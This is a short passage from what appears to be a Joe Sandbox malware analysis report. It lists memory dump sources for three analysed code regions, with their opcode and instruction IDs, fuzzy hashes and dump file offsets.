                                                                                  • Instruction Fuzzy Hash: 37C10E6140D7D59FDB038B7488A96A57FB0EF03224B2A46DFC4C58F0B3E235994AC766
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.2340811577.0000000001487000.00000004.00000020.00020000.00000000.sdmp, Offset: 01487000, based on PE: false
                                                                                  • Associated: 00000000.00000003.1950914872.0000000001487000.00000004.00000020.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_1487000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 28a66057b03ef2f2c07a41a9735bd8124f90a9b76b3bcc7e784949467531d5ac
                                                                                  • Instruction ID: b70efc35d47341d74adbd32eb15dbedb6b9c33876445c898409a36fa1052cf97
                                                                                  • Opcode Fuzzy Hash: 28a66057b03ef2f2c07a41a9735bd8124f90a9b76b3bcc7e784949467531d5ac
                                                                                  • Instruction Fuzzy Hash: 8F81347540A3D1AED703CF34C9A79A2BFA9FE1321475986CED5C14E063E371A11ACB52
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.2340811577.0000000001487000.00000004.00000020.00020000.00000000.sdmp, Offset: 01487000, based on PE: false
                                                                                  • Associated: 00000000.00000003.1950914872.0000000001487000.00000004.00000020.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_1487000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f24193477ecd1b712cfbb67819523358227fe270f55fbee1a73888caff6372c4
                                                                                  • Instruction ID: 53e945d48431510a5cef40811891da803f905799b059c70ea37fa22d3cde812b
                                                                                  • Opcode Fuzzy Hash: f24193477ecd1b712cfbb67819523358227fe270f55fbee1a73888caff6372c4
                                                                                  • Instruction Fuzzy Hash: 252100611092D18FD302CF38D494A82BFA1FF8B71A39E40DDC9C18F527C2A56542CB52